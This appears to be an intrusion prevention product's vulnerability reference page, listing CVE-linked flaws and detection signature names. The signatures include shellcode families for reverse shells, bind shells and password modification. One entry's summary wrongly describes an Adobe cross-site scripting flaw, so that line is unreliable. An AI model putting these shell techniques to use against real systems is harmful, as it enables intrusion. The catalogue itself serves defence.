OSVDB-89490
http://www.osvdb.org/89490
Back to top

GE-Proficy-Historian-ihDataArchiver-Buffer-Overflow

About this vulnerability: A vulnerability in GE Proficy
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: GE Proficy
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in in GE Proficy which allows remote attacker to execute malicious code on target system.
Situation: Generic_CS-GE-Proficy-Historian-ihDataArchiver-Buffer-Overflow
References:
CVE-2011-1918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1918
BID-50475
http://www.securityfocus.com/bid/50475
Back to top

GE-Proficy-Historian-Keyhelp-ActiveX-Remote-Code-Execution

About this vulnerability: A vulnerability in General Electric Proficy Historian
Risk: Moderate
First detected in: sgpkg-ips-475-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GE Proficy
Type: Input Validation
Description: A remote code execution vulnerability has been reported in GE Proficy Historian's KeyHelp ActiveX control. The vulnerability is due to insufficient validation of input supplied to the LaunchTriPane() function. A remote, unauthenticated attacker can exploit this vulnerability by enticing an unsuspecting user to access a malicious web site. This can lead to code execution in the context of the affected user.
Situation: File-Text_GE-Proficy-Historian-Keyhelp-ActiveX-Remote-Code-Execution
References:
CVE-2012-2516
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2516
OSVDB-83311
http://www.osvdb.org/83311
Back to top

GE-Proficy-Real-Time-Information-Portal-Directory-Traversal

About this vulnerability: A vulnerability in General Electric Proficy Real-Time Information Portal
Risk: Moderate
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GE Proficy
Type: Directory Traversal
Description: A directory traversal vulnerability has been identified in GE Proficy Real-Time Information Portal. The vulnerability is due to insufficient validation of two strings contained inside ID_SAVE_SRVC_CFG message requests received by rifsrvd.exe, which listens on port 5159/TCP. A remote, unauthenticated attacker could exploit this vulnerability by sending maliciously crafted requests to the affected application. In the case of a successful attack, the attacker may overwrite arbitrary files on the file system.
Situation: Generic_CS-GE-Proficy-Real-Time-Information-Portal-Directory-Traversal
References:
CVE-2012-0232
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0232
BID-52439
http://www.securityfocus.com/bid/52439
Back to top

Genbroker-Service-Denial-Of-Service

About this vulnerability: GENESIS32 version 9.21 and older, GENESIS64 version 10.51 and older integer overflow DOS
Risk: High
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ICONICS Genesis
Type: Malfunction
Description: A vulnerability in ICONICS Genbroker service that allows an attacker to crash the service by sending a specially crafted tcp packet.
Situation: Generic_CS-Genbroker-Service-Denial-Of-Service
Back to top

General-Electric-D20-Password-Recovery

About this vulnerability: A General Electric D20 Password Recovery vulnerability.
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: General Electric
Type: Insecure Configuration
Description: A vulnerability in General Electric D20ME units, and possibly others, which allows remote attackers to retrieve usernames, passwords, and authentication level list.
Situation: TFTP_General-Electric-D20-Password-Recovery
References:
CVE-2012-6663
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6663
Back to top

Generate-Cgi-File-Disclosure

About this vulnerability: Generate.cgi arbitrary file disclosure
Risk: Moderate
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Sixhead SIX-webboard
Type: Directory Traversal
Description: Generate.cgi in Sixhead SIX-webboard 2.01 does not validate input properly, allowing users to view or retrieve files not normally accessible from the host.
References:
CVE-2001-1115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1115
BID-3175
http://www.securityfocus.com/bid/3175
Back to top

Generic-AIX-ShellCode

About this vulnerability: Shellcode for AIX operating system
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: AIX
Software: <os>
Type: Buffer Overflow
Description: This is a generic vulnerability description for shellcode that can be executed on IBM AIX. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation: Shared_ShellCode-AIX-Execve
Shared-UDP_ShellCode-AIX-Execve
Back to top

Generic-BSD-PPC-ShellCode

About this vulnerability: Shellcode for BSD/PPC operating system.
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: BSD
Software: <os>
Type: Buffer Overflow
Description: This is a generic vulnerability description for shellcode that can be executed on BSD/PPC. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation: Shared_ShellCode-BSD-PPC-Execve
Back to top

Generic-BSDi-ShellCode

About this vulnerability: Shellcode for BSDi operating system.
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: BSDi
Software: <os>
Type: Buffer Overflow
Description: This is a generic vulnerability description for shellcode that can be executed in BSDi operating system. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation: Shared_ShellCode-BSDi-Execve
Shared_ShellCode-BSDi-Execve-2
Shared_ShellCode-BSDi-Execve-Toupper-Evasion
Back to top

Generic-CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Computer Associates BrightStor ARCserve Backup
Risk: High
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-1554-5242
Platform: Windows
Software: Computer Associates BrightStor; Computer Associates Business Protection Suite 2; Computer Associates Server Protection Suite 2
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Computer Associates BrightStor ARCserver Backup. A crafted request made to the affected service may be used to execute code in the context of the backup tape engine, leading to system compromise.
Situation: MSRPC-TCP_CPS-CA-BrightStor-Arcserve-Backup-Tape-Engine-RPC-Buffer-Overflow
References:
CVE-2007-0169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0169
BID-22005
http://www.securityfocus.com/bid/22005
Back to top

Generic-CA-Message_Queuing-BOF

About this vulnerability: Buffer Overflows in CA Message Queuing
Risk: High
First detected in: sgpkg-ips-43-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CA Message Queuing
Type: Buffer Overflow
Description: Remote exploitable buffer overflows exists in Computer Associates (CA) Message Queuing (CAM / CAFT) versions 1.05, 1.07 before Build 220_13, and 1.11 before Build 29_13. Successful exploits cause denial of service and remote access without authentication. Working exploits are publicly available.
Situation: Generic_CA-Message-Queuing-BOF
References:
CVE-2005-2668
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2668
BID-14622
http://www.securityfocus.com/bid/14622
OSVDB-18916
http://www.osvdb.org/18916
Back to top

Generic-DG-UX-ShellCode

About this vulnerability: Shellcode for DG/UX operating system.
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: DG UX
Software: <os>
Type: Buffer Overflow
Description: This is a generic vulnerability description for shellcode that can be executed in DG/UX operating system. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation: Shared_ShellCode-DG-UX-Execve
Back to top

Generic-FreeBSD-ShellCode

About this vulnerability: Shellcode for FreeBSD operating system.
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: FreeBSD
Software: <os>
Type: Buffer Overflow
Description: This is a generic vulnerability description for shellcode that can be executed in FreeBSD operating system. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation: Shared_ShellCode-FreeBSD-Execve
Shared_ShellCode-FreeBSD-Passive-Connect
Back to top

Generic-FTGate4-Buffer-Overflow

About this vulnerability: Detects FTGate4 Buffer Overflow Exploits
Risk: Moderate
First detected in: sgpkg-ips-57-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Floosietek FTGatePro
Type: Buffer Overflow
Description: FTGate4 is a Windows communication suite that combines mail handling facilities with Groupware functionality. FTGate 4.4 has a stack based buffer overflow vulnerability that can be exploited via a specially crafted POST or GET request. If the tzoffset parameter contains more than 196 characters, a stack buffer overflow occurs allowing a remote attacker to cause a DoS or possibly execute arbitrary code.
Situation: HTTP_CRL-FTGate4-Buffer-Overflow-Vulnerability
References:
CVE-2005-4569
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4569
BID-15972
http://www.securityfocus.com/bid/15972
Back to top

Generic-Gnu-Tar-PAX-Extended-Headers-Handling-Buffer-Overflow

About this vulnerability: Gnu Tar PAX extended headers handling buffer overflow
Risk: Moderate
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: GNU Tar
Type: Buffer Overflow
Description: The GNU Tar program has a buffer overflow vulnerability. If a malformed Tar archive is delivered to a target user who opens it with the vulnerable program, a DoS or possibly arbitrary code execution may occur.
Situation: HTTP_Gnu-Tar-PAX-Extended-Headers-Handling-Buffer-Overflow
E-Mail_BS-Gnu-Tar-PAX-Extended-Headers-Handling-Buffer-Overflow
File-Binary_Gnu-Tar-PAX-Extended-Headers-Handling-Buffer-Overflow
References:
CVE-2006-0300
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0300
BID-16764
http://www.securityfocus.com/bid/16764
OSVDB-23371
http://www.osvdb.org/23371
Back to top

Generic-HP-UX-ShellCode

About this vulnerability: Shellcode for HP-UX operating system.
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: HP-UX
Software: <os>
Type: Buffer Overflow
Description: This is a generic vulnerability description for shellcode that can be executed in HP-UX operating system. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation: Shared_ShellCode-HP-UX-Execve
Back to top

Generic-HTTP-Exploit

About this vulnerability: Suspicious traffic patterns
Risk: Moderate
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-1790-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: This vulnerability refers to a number of situations that detect known suspicious or malicious traffic patterns.
Situation: Generic_CS-Suspicious-Request
Generic_SS-Suspicious-Traffic
Generic_UDP-Suspicious-Packet
Generic_UDP-Malicious-Packet
Generic_UDP-Suspicious-Server-Certificate
DNS-UDP_Suspicious-Query
DNS-UDP_Suspicious-Response
HTTP_CS-Suspicious-File-Upload
HTTP_CS-Suspicious-Request-URI
HTTP_CS-Request-To-Suspicious-Poc-File
HTTP_CSU-Suspicious-Request
HTTP_CS-Request-To-Suspicious-File-With-Obsolete-Browser
HTTP_CS-Request-To-Suspicious-Poc-File-With-Obsolete-Browser
HTTP_CSH-MS-Suspicious-Headers-Detected
HTTP_CRL-Malicious-Request
HTTP_SHS-Suspicious-Server-Reply
SMTP_CS-Suspicious-Command
E-Mail_Suspicious-Header
NNTP_Suspicious-Traffic
SSH_Suspicious-Server-Response
HTTP_CRL-RIG-EK-Request
Telnet_CCS-Suspicious-Authentication-Request
NetBIOS-TCP_Suspicious-Request
MSRPC-TCP_Suspicious-Request
HTTPS_CS-Suspicious-Handshake-Request
HTTPS_CS-Suspicious-Client-Request
HTTPS_SS-Suspicious-Server-Response
HTTPS_SS-Suspicious-Server-Certificate
SMB-TCP_CHS_Suspicious-Request
NetBIOS-UDP_Suspicious-Request
SNMP-UDP_Malformed-Get
RFB_CS-Suspicious-Request
RFB_SS-Suspicious-Server-Response
POP3_CS-Suspicious-Packet
BOOTP_CS-Suspicious-Request
LDAP_CS-Suspicious-Packet
LDAP_SS-Suspicious-Packet
TNS_CS-Suspicious-Request
SIP-TCP_Malicious-Request
SIP-UDP_CS-Malicious-Request
SVN_Suspicious-Request
HTTP_CHS-Suspicious-Host
HTTP_CSH-Known-Exploit-Kit-Headers
File-Text_RIG-EK-Lander-Script
File-Text_EK-Flash-Loader-Script
File-Text_Suspicious-Flash-Detector-Script
File-OLE_Suspicious-File
File-Flash_Suspicious-Flash-File
File-Flash_Adobe-Flash-CVE-2013-5331
File-Flash_Adobe-Flash-CVE-2013-0634
File-Flash_RIG-EK-Exploit
File-Flash_DoSWF-Obfuscation
File-Flash_Magnitude-Exploit-Stager
File-Flash_Suspicious-Content-From-IP-Address-Host
File-Flash_Video-Content-From-IP-Address-Host
File-Flash_Suspicious-Content-From-Random-Host
File-PDF_Suspicious-File
File-PDF_Coolpdf-Reader-CVE-2012-4914
File-Binary_Suspicious-File
File-Binary_SketchUp-Pict-File-CVE-2013-3664
File-Binary_Microsoft-Access-CVE-2013-3156
File-Binary_Windows-OpenType-CVE-2013-3128
File-Binary_Oracle-Outside-In-CVE-2013-5791
File-Binary_Microsoft-Access-CVE-2013-3155
HTTP_CS-Request-To-Suspicious-File
File-Text_Suspicious-Text-File
File-JPEG_Suspicious-File
File-PNG_Suspicious-File
File-GIF_Suspicious-File
File-GIF_MS-DirectShow-CVE-2013-3174
File-RTF_Suspicious-File
File-TextId_Suspicious-Text-File
File-MPEG_Suspicious-File
File-Zip_Suspicious-File-Detected
File-Exe_Suspicious-File
File-Exe_Themida-Packed-Executable
File-Exe_Themida-Packed-Executable-2
File-Text_Suspicious-Text-File-2
Back to top

Generic-HTTP-URI-Directory-Traversal

About this vulnerability: HTTP URI directory traversal
Risk: Moderate
First detected in: sgpkg-ips-58-1210
Last changed: sgpkg-ips-1638-5242
Platform: Generic
Software: <os>
Type: Directory Traversal
Description: Many web server implementations are vulnerable to directory traversal attempts. Using vulnerable servers a remote attacker is able to access documents that are located outside the web root directory.
Situation: HTTP_CRL-URI-Directory-Traversal-2
Back to top

Generic-IBM-Lotus-Notes-HTML-Speed-Reader-Long-Url-Buffer-Overflow-Vulnerability

About this vulnerability: IBM Lotus Notes HTML Speed Reader Long Url Buffer Overflow Vulnerability
Risk: High
First detected in: sgpkg-ips-60-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lotus Notes
Type: Buffer Overflow
Description: IBM Lotus Notes HTML Speed Reader component has a buffer overflow vulnerability If a crafted HTML attachment is delivered to a Lotus Notes user who opens it andfollows a malious link a Dos or non-privileged code execution may occur.
Situation: E-Mail_BS-IBM-Lotus-Notes-HTML-Speed-Reader-Long-Url-Buffer-Overflow
File-Text_IBM-Lotus-Notes-HTML-Speed-Reader-Long-Url-Buffer-Overflow
References:
CVE-2005-2618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2618
BID-16576
http://www.securityfocus.com/bid/16576
OSVDB-23068
http://www.osvdb.org/23068
OSVDB-23067
http://www.osvdb.org/23067
OSVDB-23066
http://www.osvdb.org/23066
OSVDB-23065
http://www.osvdb.org/23065
OSVDB-23064
http://www.osvdb.org/23064
Back to top

Generic-IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption

About this vulnerability: IBM Tivoli Storage Manager Heap Corruption
Risk: High
First detected in: sgpkg-ips-213-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IBM Tivoli Storage Manager
Type: Input Validation
Description: A buffer overflow vulnerability exists in IBM Tivoli Storage Manager. This vulnerability is due to a lack of validation of a user supplied value in a message. This value is later used as a counter to populate a fixed length heap buffer. A remote unauthenticated attacker may leverage this vulnerability to create a denial of service condition of the affected service, or inject and execute arbitrary code on the target host. In an attack case where code injection is not successful, the target IBM Tivoli Express Backup Server service will terminate. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute with SYSTEM level privileges.
Situation: Generic_IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption-2
Generic_IBM-Tivoli-Storage-Manager-Express-Backup-Heap-Corruption
References:
CVE-2008-4563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4563
BID-34077
http://www.securityfocus.com/bid/34077
OSVDB-52617
http://www.osvdb.org/52617
Back to top

Generic-IBM-Tivoli-Storage-Manager-Initial-Sign-On-Request-Buffer-Overflow

About this vulnerability: Buffer overflow within initial sign-on request of IBM Tivoli Storage Manager
Risk: Moderate
First detected in: sgpkg-ips-86-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IBM Tivoli Storage Manager
Type: Input Validation
Description: Buffer overflow within initial sign-on request of IBM Tivoli Storage Manager
Situation: Generic_IBM-Tivoli-Storage-Manager-Initial-Sign-On-Request-Buffer-Overflow
References:
CVE-2006-5855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5855
BID-21440
http://www.securityfocus.com/bid/21440
Back to top

Generic-LDAP-Injection

About this vulnerability: Generic LDAP Injection over HTTP
Risk: Low
First detected in: sgpkg-ips-149-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP server
Type: Malfunction
Description: LDAP (Lightweight Directory Access Protocol) is a protocol for querying and modifying directory services. Many applications and services rely on LDAP directories for access control, privilege management and resource management. LDAP injection attacks are based on similar techniques than SQL injection attacks, and are usually made possible by insufficient input sanitation in server applications. Possible impacts of successful LDAP injection attacks range from information disclosures to privilege escalation allowing further attacks.
Back to top

Generic-Linux-PPC-ShellCode

About this vulnerability: Shellcode for Linux/PPC operating system.
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Buffer Overflow
Description: This is a generic vulnerability description for shellcode that can be executed on Linux/PPC. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation: Shared_ShellCode-Linux-PPC-Execve
Back to top

Generic-Linux-Sparc-ShellCode

About this vulnerability: Shellcode for Linux/Sparc operating system.
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Buffer Overflow
Description: This is a generic vulnerability description for shellcode that can be executed in Linux/SPARC. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation: Shared_ShellCode-Linux-Sparc-Setreuid-Execve
Shared_ShellCode-Linux-Sparc-Setreuid-Execve2
Shared_ShellCode-Linux-Sparc-Setreuid-Setregid-Execve
Shared_ShellCode-Linux-Sparc-Setreuid-Tolower-Execve
Shared_ShellCode-Linux-Sparc-Setuid-Execve
Back to top

Generic-Linux-X86-ShellCode

About this vulnerability: Shellcode for Linux/x86 operating system.
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Buffer Overflow
Description: This is a generic vulnerability description for shellcode that can be executed in Linux/x86. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation: Shared_ShellCode-Linux-X86-Bind
Shared_ShellCode-Linux-X86-Chroot-Break-1
Shared_ShellCode-Linux-X86-Chroot-Break-2
Shared_ShellCode-Linux-X86-Chroot-Break-3
Shared_ShellCode-Linux-X86-Connect
Shared_ShellCode-Linux-X86-Drop-Shell
Shared_ShellCode-Linux-X86-Execve-Binsh-1
Shared_ShellCode-Linux-X86-Execve-Binsh-2
Shared_ShellCode-Linux-X86-Mini-Sh
Shared_ShellCode-Linux-X86-Portshell
Shared_ShellCode-Linux-X86-File-Append
Shared_ShellCode-Linux-X86-Reverse-Telnet
Shared_ShellCode-Linux-X86-SCC
Shared_ShellCode-Linux-X86-Setregid-Execve
Shared_ShellCode-Linux-X86-Tmp-Sh
Shared_ShellCode-Linux-X86-Execve-Tolower-Evasion
Shared_ShellCode-Linux-X86-Execve-Toupper-Evasion
Shared_ShellCode-Linux-X86-Write-1
Shared_ShellCode-Linux-X86-Write-2
Shared_ShellCode-Linux-X86-Xterm
Shared_ShellCode-Linux-X86-Execve-0xff-Less
Back to top

Generic-Malicious-Iframe

About this vulnerability: A malicious iframe used by exploit stagers detected.
Risk: Moderate
First detected in: sgpkg-ips-851-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic browser
Type: Code Injection
Description: A malicious iframe used by exploit stagers was detected.
Situation: File-Text_Malicious-Iframe-2
Back to top

Generic-Mozilla-Thunderbird-Iframe-JavaScript-Execution

About this vulnerability: JavaScript execution vulnerability in Mozilla Thunderbird
Risk: Moderate
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Thunderbird
Type: Code Injection
Description: The Mozilla Thunderbird email client has a JavaScript execution vulnerability. The vulnerability can be exploited by sending a crafted email message containing malious JavaScript code in the src attribute between Iframe tags to a target user who opens the message with the vulnerable email client and edits the message, for example by replying to it. A successful attack leads to arbitrary JavaScript code execution.
Situation: E-Mail_BS-Mozilla-Thunderbird-Iframe-JavaScript-Execution
File-Text_Mozilla-Thunderbird-Iframe-JavaScript-Execution
References:
CVE-2006-0884
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0884
BID-16770
http://www.securityfocus.com/bid/16770
OSVDB-23653
http://www.osvdb.org/23653
Back to top

Generic-MSDTC-BuildContextW-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in Microsoft DTC BuildContextW method (MS06-018)
Risk: Moderate
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-1555-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: Microsoft Windows Distributed Transaction Coordinator (MSDTC) suffers from a denial of service vulnerability. Remote attackers can cause the MSDTC service to crash by binding to the MSDTC RPC service and sending a malicious request to the BuildContextW method. This vulnerability is similar to the one patched in MS05-051, but does not allow remote code execution.
Situation: MSRPC-TCP_CPS-PnP-MSDTC-BuildContextW-Denial-Of-Service
References:
CVE-2006-1184
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1184
BID-17905
http://www.securityfocus.com/bid/17905
OSVDB-25336
http://www.osvdb.org/25336
MS06-018
http://technet.microsoft.com/security/bulletin/MS06-018
Back to top

Generic-MSDTC-BuildContextW-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Microsoft DTC BuildContextW method
Risk: Critical
First detected in: sgpkg-ips-41-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Windows Distributed Transaction Coordinator
Type: Buffer Overflow
Description: Microsoft Windows Distributed Transaction Coordinator (MSDTC) suffers from a buffer overflow vulnerability. Remote attackers can execute arbitrary code with SYSTEM privileges by connecting to the MSDTC server and sending a malicious request to the MSDTC RPC interface's BuildContextW method.
Situation: MSRPC-TCP_CPS-MSDTC-BuildContextW-Memory-Corruption-2
Generic_MSDTC-BuildContextW-Memory-Corruption
Generic_MSDTC-BuildContextW-Memory-Corruption-2
References:
CVE-2005-2119
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2119
BID-15056
http://www.securityfocus.com/bid/15056
OSVDB-18828
http://www.osvdb.org/18828
MS05-051
http://technet.microsoft.com/security/bulletin/MS05-051
Back to top

Generic-NetBSD-ShellCode

About this vulnerability: Shellcode for NetBSD operating system.
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: NetBSD
Software: <os>
Type: Buffer Overflow
Description: This is a generic vulnerability description for shellcode that can be executed on NetBSD. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation: Shared_ShellCode-NetBSD-Execve
Back to top

Generic-Novell-NetMail-NMAP-Stor-Command-Buffer-Overflow

About this vulnerability: A vulnerability in Adobe Acrobat Reader allows cross site scripting
Risk: Moderate
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Novell NetMail
Type: Buffer Overflow
Description: There is a buffer overflow in the Novell Netmail. A STOR command for the NMAP componet can be used to overflow a static buffer. This may lead to code execution or denial of service.
Situation: Generic_Novell-NetMail-NMAP-Stor-Command-Buffer-Overflow
References:
CVE-2006-6424
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6424
BID-21725
http://www.securityfocus.com/bid/21725
Back to top

Generic-OpenBSD-ShellCode

About this vulnerability: Shellcode for OpenBSD operating system.
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: OpenBSD
Software: <os>
Type: Buffer Overflow
Description: This is a generic vulnerability description for shellcode that can be executed on OpenBSD. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation: Shared_ShellCode-OpenBSD-Passwd-Modify
Shared_ShellCode-OpenBSD-Reverse-Portshell
Shared_ShellCode-OpenBSD-Portshell
Back to top

Generic-Oracle-WebCache-Invalid-Request-DoS

About this vulnerability: Oracle WebCache Invalid Request DoS
Risk: Low
First detected in: sgpkg-ips-85-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Oracle 9i
Type: Malfunction
Description: Oracle 9i Web Admin denial of service with malformed URI request.
Situation: Generic_Oracle-WebCache-Invalid-Request-DoS
References:
CVE-2002-0386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0386
BID-5902
http://www.securityfocus.com/bid/5902
Back to top

Generic-SCO-OpenServer-ShellCode

About this vulnerability: Shellcode for SCO OpenServer operating system.
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: SCO
Software: <os>
Type: Buffer Overflow
Description: This is a generic vulnerability description for shellcode that can be executed on SCO OpenServer. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation: Shared_ShellCode-SCO-OpenServer-Chroot-Break
Shared_ShellCode-SCO-OpenServer-Execve
Back to top

Generic-SCO-UnixWare-ShellCode

About this vulnerability: Shellcode for SCO UnixWare operating system.
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: SCO
Software: <os>
Type: Buffer Overflow
Description: This is a generic vulnerability description for shellcode that can be executed on SCO UnixWare. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation: Shared_ShellCode-SCO-UnixWare-Execve
Back to top

Generic-Shared-Variables

About this vulnerability: Not a vulnerability, fingerprints that set shared variables refer to this VID
Risk: Low
First detected in: sgpkg-ips-24-1210
Last changed: sgpkg-ips-1866-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: This is not vulnerability. Fingerprints that set shared variables refer to this VID. Some groups have fingerprints that only set shared variables that are used by other fingerprints in the group. Disabling such fingerprints will break any fingerprint that uses the shared variables.
Situation: Generic_SS-Shared-Variables-Fingerprint
Generic_UDP-Shared-Variables
Shared_SS-Shared-Variables
HTTP_CSU-Shared-Variables
HTTP_CSH-Shared-Variables
HTTP_CS-Shared-Variables-For-Client-Stream-Context
HTTP_CRL-Shared-Variables
HTTP_SHS-Shared-Variables
SMTP_CS-Shared-Variables
SMTP_Shared-Variables-For-Server-Stream-Context
E-Mail_HCS-Shared-Variables
E-Mail_BS-Shared-Variables
HTTP_Shared-Variables-For-Server-Stream-Context
FTP_SS-Shared-Variables
FTP_CS-Shared-Variables-For-Client-Stream-Context
NNTP_CS-Shared-Variable-Fingerprint
SSH_CS-Shared-Variables
SSH_SS-Shared-Variables
Telnet_CS-Shared-Variables
Telnet_Shared-Variables
Telnet_STS-Shared-Variables
SMB-TCP_Shared-Variable-Fingerprint
MSRPC-TCP_CPS-Shared-Variable-Fingerprints
HTTPS_CS-Shared-Variables-For-Client-Stream-Context
HTTPS_SS-Shared-Variables-For-Server-Stream-Context
SMB-TCP_CHS-Shared-Variable-Fingerprint
IMAP_Server-Shared-Variables
POP3_Server-Shared-Variables
HTTP_SCH-Shared-Variables
BOOTP_Shared-Variables
Generic_CS-Shared-Variable-Fingerprints
LDAP_SS-Shared-Variables-For-Server-Stream-Context
SIP_Shared-Variables
HTTP_SLS-Shared-Variables
HTTP_URL-Shared-Variables
HTTP_PSU-Shared-Variables
HTTP_PSH-Shared-Variables
HTTP_CSC-Shared-Variables
HTTP_Shared-Variables-For-Server-Ie-Stream-Context
IPv6_Shared-Variables
File-OLE_Shared-Variables
File-Flash_Shared-Variables
File-PDF_Shared-Variables
File-Binary_Shared-Variables
HTTP_SHS-Shared-Variables-2
File-Text_Shared-Variables
File-JPEG_Shared-Variables
File-PNG_Shared-Variables
File-RTF_Shared-Variables
File-RIFF_Shared-Variables
File-TextId_Shared-Variables
File-Zip_Shared-Variables
File-Member-Name_Shared-Variables
File-Name_Shared-Variables
Datalength-UDP_Shared-Variables
Datalength-TCP_Shared-Variables
Back to top

Generic-SMB-Exploit

About this vulnerability: Suspicious traffic patterns
Risk: Moderate
First detected in: sgpkg-ips-681-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: This vulnerability refers to a number of situations that detect known suspicious or malicious traffic patterns.
Situation: SMB-TCP_Suspicious-Server-Response
Back to top

Generic-Solaris-Sparc-ShellCode

About this vulnerability: Shellcode for Sun Solaris/Sparc operating system.
Risk: High
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: Solaris
Software: <os>
Type: Buffer Overflow
Description: This is a generic vulnerability description for shellcode that can be executed on Sun Solaris/Sparc. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation: Shared_ShellCode-Solaris-Sparc-Portbind
Shared_ShellCode-Solaris-Sparc-Setreuid-Execve
Back to top

Generic-SSH-Exploit

About this vulnerability: Suspicious traffic patterns
Risk: Moderate
First detected in: sgpkg-ips-767-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: This vulnerability refers to a number of situations that detect known suspicious or malicious traffic patterns.
Situation: SSH_Suspicious-Client-Request
Back to top

Generic-Symantec-AntiVirus-Scan-Engine-Buffer-Overflow-Vulnerability

About this vulnerability: Symantec AntiVirus Scan Engine Administrative Interface Buffer Overflow Vulnerability
Risk: Critical
First detected in: sgpkg-ips-60-1210
Last changed: sgpkg-ips-1584-5242
Platform: Generic
Software: Symantec AntiVirus Scan Engine
Type: Buffer Overflow
